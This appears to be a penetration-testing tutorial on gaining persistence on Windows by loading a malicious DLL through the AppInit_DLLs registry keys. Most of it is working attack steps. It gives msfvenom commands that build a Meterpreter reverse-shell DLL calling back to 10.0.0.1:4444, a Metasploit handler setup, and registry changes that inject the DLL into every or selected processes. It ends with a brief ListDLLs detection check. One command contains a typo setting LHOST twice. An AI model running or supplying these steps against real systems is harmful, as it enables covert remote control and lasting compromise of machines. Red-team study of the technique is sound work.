Windows operating systems provide the functionality to allow custom DLL’s to be loaded into the address space of almost all application processes. This can give the opportunity for persistence since an arbitrary DLL can be loaded that will execute code when applications processes are created on the system. Administrator level privileges are required to implement this technique. The following registry keys control the loading of DLL’s into applications via AppInit.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows

Metasploit utility “msfvenom” can be used to generate the DLL that will contain the payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f dll > pentestlab.dll

Metasploit – Generate DLL

The “handler” Metasploit module needs to be configured in order to retrieve the connection when the payload is executed.

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 4444 exploit

Metasploit – Module Handler

Microsoft to protect Windows users from malware has disabled by default the loading of DLLs’s via AppInit. However, setting the registry key “LoadAppInit_DLLs” to value “1” will enable this functionality. Dropping the arbitrary DLL into the “Program Files” directory and modifying the “AppInit_DLLs” registry key to contain the path of the DLL will load the pentestlab.dll into every Windows application. This is because DLL’s that are specified in the “AppInit_DLLs” registry key are loaded by the user32.dll which is used by almost all applications.

Enable LoadAppInit_DLLs - 32bit and 64bit HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs - 0x1 HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs - 0x1 Registry Key for Arbitrary DLL via AppInit - 32bit and 64bit HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLs HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs

AppInit DLLs – Registry Keys

Since the “pentestlab.dll” will be loaded into every Windows application process this means that multiple Meterpreter sessions will be created. Configuring the handler with the following settings will enable the module to run as a background job and to retrieve all the sessions.

set ExitOnSession false exploit -j

Persistence AppInit DLLs – Multiple Sessions

When a new process is created on the target system a communication channel will established which will lead to multiple sessions.

Persistence AppInit DLL – Multiple Meterpreter Sessions

Interaction with a specific session can start by executing the following command:

sessions -i 11

Persistence AppInit DLL – Meterpreter

However the implementation of this method can lead to stability and performance issues on the target system. Furthermore, this approach is considered very noisy since multiple connections on random high level ports will established. To eliminate these issues Didier Stevens developed a DLL which will check the configuration file called “LoadDLLViaAppInit.bl.txt” in order to determine which processes will load the arbitrary DLL. Metasploit Framework can be used again to generate the required DLL.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LHOST=4444 -f dll > pentestlab.dll

Metasploit Generate x64 DLL

Metasploit “handler” module needs to be configured accordingly in order to capture the connection.

use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LPORT 4444 set LHOST 10.0.0.1 exploit

Metasploit – Handler Module

Both the “LoadDLLViaAppInit” DLL and its configuration file “LoadDLLViaAppInit64.bl.txt” needs to be dropped to disk into the following folder. The arbitrary DLL must be stored on the same folder as well.

C:\Windows\System32

LoadDLLviaAppInit Files

The configuration file defines into which processes the arbitrary DLL will be loaded. The format needs to be as the screenshot below:

LoadDLLviaAppInit – Configuration

The “AppInit_DLLs” registry key needs to be modified to contain the path of the “LoadDLLViaAppInit.dll“.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

AppInit DLL – Process

The next time that the “notepad.exe” process will be created on the system the arbitrary DLL will be loaded through the “LoadDLLViaAppInit.dll“. The payload will executed and a Meterpreter session will open. This persistence method used “notepad.exe” process as the trigger.

Persistence AppInit DLLs – Meterpreter via Notepad

The utility ListDLLs from Sysinternals can be used to obtain information about the DLL’s that are loaded into processes. The following command will retrieve the DLL’s that have been loaded into the notepad process which was the selected process for persistence.

Listdlls64.exe -v notepad

Listdlls – Notepad

The following screenshot validates that both DLL’s “LoadDLLViaAppInit64.dll” and “pentestlab.dll” have been loaded into the address space of notepad.exe process.

Listdlls – Malicious DLL Loaded

References